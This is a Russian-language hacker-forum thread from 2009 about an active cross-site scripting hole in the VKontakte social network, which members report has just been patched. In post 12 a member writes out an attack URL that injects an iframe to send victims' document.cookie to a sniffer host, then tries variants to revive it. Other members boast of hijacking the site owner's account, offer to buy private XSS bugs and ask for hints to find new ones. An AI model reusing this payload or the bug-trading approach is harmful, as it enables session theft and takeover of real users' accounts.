Active xss vkontakte.ru

Discussion in 'Социальные сети' started by banned, 27 May 2009.

  1. Ustas.PC

    Ustas.PC New Member

    Joined:
    2 Mar 2009
    Messages:
    6
    Likes Received:
    0
    Reputations:
    0
    прикрыли походу, у меня не работает уже =\
     
  2. brain[pillow]

    brain[pillow] Active Member

    Joined:
    7 Nov 2008
    Messages:
    7
    Likes Received:
    103
    Reputations:
    74
    Угу, пофиксили
     
  3. gosuindahouse

    gosuindahouse Banned

    Joined:
    4 Jun 2009
    Messages:
    8
    Likes Received:
    5
    Reputations:
    0
    днем еще работало, бля...
     
  4. Damned_one

    Damned_one Member

    Joined:
    24 Nov 2008
    Messages:
    12
    Likes Received:
    11
    Reputations:
    5
    кхм.. ну тёрли бы тогда чтоли отсюдова.. сами виноваты
     
  5. [ Dumi ]

    [ Dumi ] Member

    Joined:
    27 May 2009
    Messages:
    21
    Likes Received:
    66
    Reputations:
    13
    не*** апать тему было
     
  6. Damned_one

    Damned_one Member

    Joined:
    24 Nov 2008
    Messages:
    12
    Likes Received:
    11
    Reputations:
    5
    народ, а есть шанс немного переписать ее? всмысле можно повертеть с фильтрами или они образноговоря одним щелчком мыши применили свои мегакрутые фильтры для этого поля?

    Короче говоря стоит ли овечка выделки?
     
  7. wildshaman

    wildshaman Elder - Старейшина

    Joined:
    16 Apr 2008
    Messages:
    477
    Likes Received:
    483
    Reputations:
    99
    ничего не выйдет, там хтмлспецчарс
     
  8. [ Dumi ]

    [ Dumi ] Member

    Joined:
    27 May 2009
    Messages:
    21
    Likes Received:
    66
    Reputations:
    13
    как бэ там тоже не дураки но всеравно спасябо изосу я дурова опхекал
     
  9. Damned_one

    Damned_one Member

    Joined:
    24 Nov 2008
    Messages:
    12
    Likes Received:
    11
    Reputations:
    5
    какбы у меня появилось предложение жаль невовремя - надо было раз уже не захотели сразу тем утереть рассылать всем сообщения чтоб трындели "уже прикрыли" zzzz

    Еще вопросик, а как с API вконтакте работать? Всмысле ручками потрогать все эти поля
     
    #29 Damned_one, 4 Jun 2009
    Last edited: 4 Jun 2009
  10. Damned_one

    Damned_one Member

    Joined:
    24 Nov 2008
    Messages:
    12
    Likes Received:
    11
    Reputations:
    5
    а у когонить такое вылетало?

    <?xml version="1.0" encoding="utf-8" ?>
    - <error>
    <error_code>101</error_code>
    <error_msg>Invalid application API ID</error_msg>
    - <request_params list="true">
    - <param>
    <key>v</key>
    <value>2.0</value>
    </param>
    - <param>
    <key>sig</key>
    <value>'; бывшее поле ввода хсс</value>
    </param>
    - <param>
    <key>format</key>
    <value>JSON&quot;;</value>
    </param>
    </request_params>
    </error>
     
  11. Ustas.PC

    Ustas.PC New Member

    Joined:
    2 Mar 2009
    Messages:
    6
    Likes Received:
    0
    Reputations:
    0
    нет.
     
  12. Ustas.PC

    Ustas.PC New Member

    Joined:
    2 Mar 2009
    Messages:
    6
    Likes Received:
    0
    Reputations:
    0
    короче я сдесь чето помудился, зашол на api.vkontakte.ru/api.php
    открыл исходник и что же там написано ? а написано там

    <?xml version="1.0" encoding="utf-8"?>
    <error>Invalid application API ID</error>

    к нашему скрипту

    http://api.vkontakte.ru/api.php?v=2.0&sig=<iframe+src=.+onload=location.href='http://sniffer?'%2Bdocument.cookie>&format=JSON

    там где v=2.0 я поменял на v=1.0

    тоесть получился

    http://api.vkontakte.ru/api.php?v=1.0&sig=<iframe+src=.+onload=location.href='http://sniffer?'%2Bdocument.cookie>&format=JSON

    теперь пишит

    {"error":"Invalid application API ID"}

    теперь потрепаюсь над этим может что нибудт и получиться......
     
  13. F1shka

    F1shka Elder - Старейшина

    Joined:
    10 Apr 2008
    Messages:
    173
    Likes Received:
    305
    Reputations:
    3
    АВРАМ ПЕРЕСТАНЬ ИЗДЕВАТЬСЯ НАД МАЛЕНЬКИМ! :D :D :D :D :D :D
     
  14. ZayabisSurfer

    ZayabisSurfer New Member

    Joined:
    15 Apr 2009
    Messages:
    0
    Likes Received:
    0
    Reputations:
    0
    XSS то работала! Не пойму нах в паблик было кидать ?)) Можно было в приват скинуть и реально подняться. Если ещё кто баги найдёт,пишите в личку,хорошо заплачу за подобные XSSы
    ---------
    Изя , ты коммерчески не подкован ))
     
  15. Sin3v

    Sin3v Banned

    Joined:
    16 Jul 2008
    Messages:
    11
    Likes Received:
    95
    Reputations:
    9
    Если бы ее в приват кидали, ты бы ее и не поюзал как и сейчас, а че вы все ноите, там их щас ппц много стало. У меня уже активка и две пассивки!!!
     
  16. Timofa

    Timofa New Member

    Joined:
    4 Jun 2009
    Messages:
    5
    Likes Received:
    3
    Reputations:
    0
    Ну дык делись! )
     
  17. s_p_a_m

    s_p_a_m Elder - Старейшина

    Joined:
    8 Feb 2008
    Messages:
    100
    Likes Received:
    58
    Reputations:
    4
    подскажи хоть приблизительно где искать :) в ПМ, с меня +++ )
     
  18. MasterProg

    MasterProg New Member

    Joined:
    28 Jan 2007
    Messages:
    5
    Likes Received:
    2
    Reputations:
    0
    И мне! xD
     
  19. GodSenD

    GodSenD Banned

    Joined:
    27 Mar 2009
    Messages:
    0
    Likes Received:
    35
    Reputations:
    0
    в каком направлении рыть?
     
  20. jkSeyv

    jkSeyv Member

    Joined:
    19 Jan 2009
    Messages:
    0
    Likes Received:
    18
    Reputations:
    3
    поднимаю тему и подключаюсь)